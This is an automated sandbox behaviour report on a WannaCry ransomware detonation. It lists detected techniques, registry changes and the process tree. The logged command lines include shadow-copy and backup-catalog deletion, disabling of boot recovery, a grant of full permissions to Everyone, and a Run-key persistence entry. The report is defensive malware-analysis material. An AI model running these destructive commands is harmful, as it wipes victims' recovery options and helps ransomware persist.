Analysis Overview
SHA256
0051fa06a995e0daaa5d8d3a6aded51a32975cc3b2e5f38b5a45c3847501958e
Threat Level: Known bad
The file shitting slander.mp4 was found to be: Known bad.
Malicious Activity Summary
Wannacry
Deletes shadow copies
Executes dropped EXE
Drops startup file
Reads user/profile data of web browsers
Modifies file permissions
Loads dropped DLL
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Adds Run key to start application
Enumerates connected drives
Sets desktop wallpaper using registry
Drops file in Windows directory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Uses Volume Shadow Copy service COM API
Suspicious use of SetWindowsHookEx
Modifies registry class
Modifies registry key
Modifies data under HKEY_USERS
Interacts with shadow copies
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Views/modifies file attributes
NTFS ADS
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-10-16 19:35
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-16 19:35
Reported
2024-10-16 19:41
Platform
win10-20240404-en
Max time kernel
386s
Max time network
389s
Command Line
Signatures
Wannacry
Deletes shadow copies
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD5231.tmp | C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD5238.tmp | C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\kxmrwtygyk434 = "\"C:\\Users\\Admin\\Downloads\\RANSOMWARE-WANNACRY-2.0-master\\RANSOMWARE-WANNACRY-2.0-master\\Ransomware.WannaCry\\tasksche.exe\"" | C:\Windows\SysWOW64\reg.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\P: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\unregmp2.exe | N/A |
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" | C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" | C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rescache\_merged\421858948\2704036608.pri | C:\Windows\system32\LogonUI.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master.zip:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master(1).zip:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\You-Are-An-Idiot-main.zip:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\shitting slander.mp4"
C:\Program Files (x86)\Windows Media Player\setup_wm.exe
"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\shitting slander.mp4"
C:\Windows\SysWOW64\unregmp2.exe
"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
C:\Windows\System32\unregmp2.exe
"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.0.1632826779\482042872" -parentBuildID 20221007134813 -prefsHandle 1700 -prefMapHandle 1516 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f372c4fc-e3e5-4b12-a97d-5439bbbc5097} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 1780 14ba62e6e58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.1.1011365000\1064549107" -parentBuildID 20221007134813 -prefsHandle 2108 -prefMapHandle 2104 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6255b330-1d12-40cd-9ccd-784d380abfd6} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 2136 14ba5e32f58 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.2.380441002\2121190577" -childID 1 -isForBrowser -prefsHandle 2868 -prefMapHandle 2864 -prefsLen 20866 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {568ccfb8-b9a0-494f-8314-053e9829b7c6} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 2880 14baa59bc58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.3.1910753217\1322760908" -childID 2 -isForBrowser -prefsHandle 3576 -prefMapHandle 3572 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d3c6767c-0937-4f19-a67c-c9e66908780c} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 3588 14baabc2a58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.4.754300354\1905143269" -childID 3 -isForBrowser -prefsHandle 3604 -prefMapHandle 3268 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f6a6ce6-0639-49b8-96dc-8a6ee2d21db2} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 3924 14babb30258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.5.1442828929\29876377" -childID 4 -isForBrowser -prefsHandle 4812 -prefMapHandle 4488 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c510274-ed65-493a-85dc-ca3d6dfa148e} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 4824 14bac682b58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.6.1307488610\724575438" -childID 5 -isForBrowser -prefsHandle 4964 -prefMapHandle 4968 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9e92dc18-1361-467a-b7bb-2dd3ad95dfa7} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 4956 14bad035858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.7.1889428556\905682613" -childID 6 -isForBrowser -prefsHandle 5160 -prefMapHandle 5164 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5df0c7d4-32d0-46ce-9d9b-23a65d4ce8f1} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 5152 14bad032858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.8.580235843\1059299835" -childID 7 -isForBrowser -prefsHandle 2648 -prefMapHandle 2644 -prefsLen 26328 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eec5f425-d64c-4c43-9f22-de0cda601af7} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 2660 14bae2dab58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.9.470533679\633976505" -childID 8 -isForBrowser -prefsHandle 4884 -prefMapHandle 4468 -prefsLen 26503 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1ca88035-a5c5-494f-9bc4-9260af854c58} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 4872 14b9b26a558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.10.1871038213\1190940077" -childID 9 -isForBrowser -prefsHandle 4600 -prefMapHandle 3944 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {374f9e5a-7806-4f1e-b94d-f8503db05a8a} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 4816 14b9b22d558 tab
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.csproj.FileListAbsolute.txt
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.11.221279094\153739102" -childID 10 -isForBrowser -prefsHandle 6320 -prefMapHandle 6280 -prefsLen 26808 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {787e0501-1a3d-4753-870f-18343e84baee} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 6328 14baccd2558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.12.1332645582\1475824575" -childID 11 -isForBrowser -prefsHandle 5388 -prefMapHandle 6220 -prefsLen 26808 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {136114bf-28d2-49fc-bff6-0572fdde6c24} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 6292 14baecc1058 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.0.820577293\2066161052" -parentBuildID 20221007134813 -prefsHandle 1612 -prefMapHandle 1600 -prefsLen 21145 -prefMapSize 233583 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d8e31b9e-88cd-4cbb-89ca-5265a21f1fe3} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 1704 20920cfa758 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.1.393268130\312030324" -parentBuildID 20221007134813 -prefsHandle 1980 -prefMapHandle 1976 -prefsLen 21190 -prefMapSize 233583 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3fbd7c12-8d71-43df-8433-2db82c44e0b6} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 2004 2090ebe6458 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.2.586240356\1866142644" -childID 1 -isForBrowser -prefsHandle 2712 -prefMapHandle 2708 -prefsLen 21651 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9a4c3270-0384-4024-a211-fcfe7ce8d17d} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 2724 20924847958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.3.1393738457\1864504748" -childID 2 -isForBrowser -prefsHandle 3276 -prefMapHandle 2732 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3eb94f36-7a1e-4811-81e3-723e2dec2a85} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 3288 209259e9358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.4.243577776\1733291937" -childID 3 -isForBrowser -prefsHandle 4008 -prefMapHandle 4012 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a65a7575-5a9d-458b-8191-9ec1f07edd91} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 3984 20926bbdb58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.5.1286275282\66111482" -childID 4 -isForBrowser -prefsHandle 4548 -prefMapHandle 4544 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {acdfb0a5-814c-443e-b80d-fdca19bc23a2} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 4572 2092795b758 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.6.217863551\953537729" -childID 5 -isForBrowser -prefsHandle 4712 -prefMapHandle 4716 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eecc973b-01b7-4e54-8c6b-f11cd18198ce} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 4704 2092795c358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.7.695365373\1592387224" -childID 6 -isForBrowser -prefsHandle 4904 -prefMapHandle 4908 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f7451cbf-e91b-4112-8eee-e9e36558cd1a} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 4896 2092795cc58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.8.650729503\1253576218" -childID 7 -isForBrowser -prefsHandle 3812 -prefMapHandle 4232 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {48aa7dc7-de7e-43b3-900a-e11449a13639} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 4176 209281c8558 tab
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
"C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h .
C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskdl.exe
taskdl.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 257181729107569.bat
C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo m.vbs
C:\Windows\SysWOW64\attrib.exe
attrib +h +s F:\$RECYCLE
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b @[email protected] vs
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\TaskData\Tor\taskhsvc.exe
TaskData\Tor\taskhsvc.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskdl.exe
taskdl.exe
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "kxmrwtygyk434" /t REG_SZ /d "\"C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\tasksche.exe\"" /f
C:\Windows\SysWOW64\reg.exe
